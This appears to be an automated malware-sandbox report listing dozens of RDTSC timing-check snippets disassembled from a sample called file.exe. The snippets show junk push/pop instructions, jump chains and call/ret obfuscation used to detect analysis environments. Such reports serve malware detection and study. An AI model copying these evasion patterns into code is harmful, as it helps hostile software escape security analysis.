                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D390 second address: A5D39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FA9347D66B6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D39D second address: A5D3A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D651 second address: A5D657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D657 second address: A5D65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D81E second address: A5D824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D824 second address: A5D828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D828 second address: A5D82C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D82C second address: A5D832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D832 second address: A5D859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FA9347D66C6h 0x0000000f jmp 00007FA9347D66C0h 0x00000014 push esi 0x00000015 jnc 00007FA9347D66B6h 0x0000001b pop esi 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DC3E second address: A5DC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E057 second address: A5E05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E05D second address: A5E096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA934C8B330h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jmp 00007FA934C8B335h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 jg 00007FA934C8B326h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E096 second address: A5E09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E387 second address: A5E38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E38B second address: A5E3B9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FA9347D66B8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FA9347D66C7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E3B9 second address: A5E3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E3C3 second address: A5E3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E3CB second address: A5E3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 ja 00007FA934C8B326h 0x0000000c jmp 00007FA934C8B32Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E55D second address: A5E561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5E561 second address: A5E587 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA934C8B326h 0x00000008 jmp 00007FA934C8B339h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56939 second address: A5693F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5693F second address: A56951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA934C8B32Dh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56951 second address: A56959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56959 second address: A56980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B336h 0x00000007 jno 00007FA934C8B326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56980 second address: A56984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36011 second address: A3603C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA934C8B326h 0x0000000a pop eax 0x0000000b jmp 00007FA934C8B32Ch 0x00000010 pushad 0x00000011 jmp 00007FA934C8B32Bh 0x00000016 jng 00007FA934C8B326h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5EF5E second address: A5EF68 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F0C2 second address: A5F0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA934C8B334h 0x0000000c jnp 00007FA934C8B32Ch 0x00000012 jnc 00007FA934C8B326h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F0E9 second address: A5F0EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61300 second address: A61304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32B02 second address: A32B07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6562C second address: A65630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65748 second address: A6574E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6574E second address: A65752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A647CB second address: A647D5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69E5C second address: A69E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69E62 second address: A69E87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C8h 0x00000007 jns 00007FA9347D66B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69296 second address: A692BE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FA934C8B339h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A692BE second address: A692C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A692C5 second address: A692CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A692CD second address: A692D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A692D1 second address: A692E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FA934C8B326h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6942B second address: A69469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C0h 0x00000007 jnc 00007FA9347D66B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FA9347D66D2h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69469 second address: A6948C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B337h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007FA934C8B326h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69CDF second address: A69CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BBBD second address: A6BBD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FA934C8B326h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BC4E second address: A6BC7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 29AFC4CFh 0x00000011 cmc 0x00000012 call 00007FA9347D66B9h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA9347D66BEh 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BC7B second address: A6BC85 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BC85 second address: A6BC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BC8B second address: A6BCB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA934C8B333h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FA934C8B32Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BCB5 second address: A6BCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BDA1 second address: A6BDA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BDA7 second address: A6BDB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C484 second address: A6C495 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA934C8B328h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C925 second address: A6C929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C929 second address: A6C937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA934C8B326h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C937 second address: A6C989 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FA9347D66B8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D34C0h], ecx 0x0000002a mov dword ptr [ebp+122D19E1h], edx 0x00000030 nop 0x00000031 jmp 00007FA9347D66C3h 0x00000036 push eax 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CCC1 second address: A6CCC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6EF36 second address: A6EF3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F988 second address: A6F98D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F98D second address: A6F9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA9347D66B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f jns 00007FA9347D66B8h 0x00000015 pop ebx 0x00000016 nop 0x00000017 movzx edi, si 0x0000001a push 00000000h 0x0000001c or esi, 67CC658Ah 0x00000022 push 00000000h 0x00000024 mov di, si 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F71C second address: A6F720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F720 second address: A6F724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F724 second address: A6F750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA934C8B328h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jnp 00007FA934C8B333h 0x00000017 jmp 00007FA934C8B32Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007FA934C8B326h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70F02 second address: A70F07 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70F07 second address: A70F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007FA934C8B335h 0x0000000e jmp 00007FA934C8B32Fh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FA934C8B328h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e and esi, 38194BB8h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FA934C8B328h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 push esi 0x00000051 mov dword ptr [ebp+122D1844h], esi 0x00000057 pop esi 0x00000058 call 00007FA934C8B333h 0x0000005d mov dword ptr [ebp+124553FCh], eax 0x00000063 pop edi 0x00000064 push 00000000h 0x00000066 xchg eax, ebx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push edx 0x0000006c pop edx 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70F94 second address: A70FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70FA8 second address: A70FE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007FA934C8B331h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA934C8B32Ch 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70FE0 second address: A70FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7022C second address: A70231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70231 second address: A7023B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA9347D66B6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70C9E second address: A70CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75F50 second address: A75F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77673 second address: A776F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FA934C8B328h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 pushad 0x00000022 or dx, 2AA6h 0x00000027 jnp 00007FA934C8B328h 0x0000002d popad 0x0000002e push 00000000h 0x00000030 sub dword ptr [ebp+122D2860h], eax 0x00000036 push 00000000h 0x00000038 and bh, FFFFFFB6h 0x0000003b xchg eax, esi 0x0000003c jmp 00007FA934C8B336h 0x00000041 push eax 0x00000042 je 00007FA934C8B349h 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FA934C8B337h 0x0000004f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71793 second address: A717B1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FA9347D66B8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007FA9347D66B6h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A717B1 second address: A717B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A717B7 second address: A717BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A6C0 second address: A7A6CA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D5FD second address: A7D601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D601 second address: A7D615 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Ah 0x00000007 jng 00007FA934C8B326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B2D second address: A72B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80B05 second address: A80B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA934C8B326h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80B0F second address: A80B35 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA9347D66C7h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80B35 second address: A80B3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76839 second address: A76843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81B72 second address: A81B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81C06 second address: A81C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81C0A second address: A81C14 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81C14 second address: A81C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA9347D66B6h 0x00000009 jmp 00007FA9347D66BAh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 je 00007FA9347D66C4h 0x00000018 push eax 0x00000019 push edx 0x0000001a jp 00007FA9347D66B6h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77812 second address: A7781E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA934C8B32Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82A8F second address: A82AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78886 second address: A7888B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
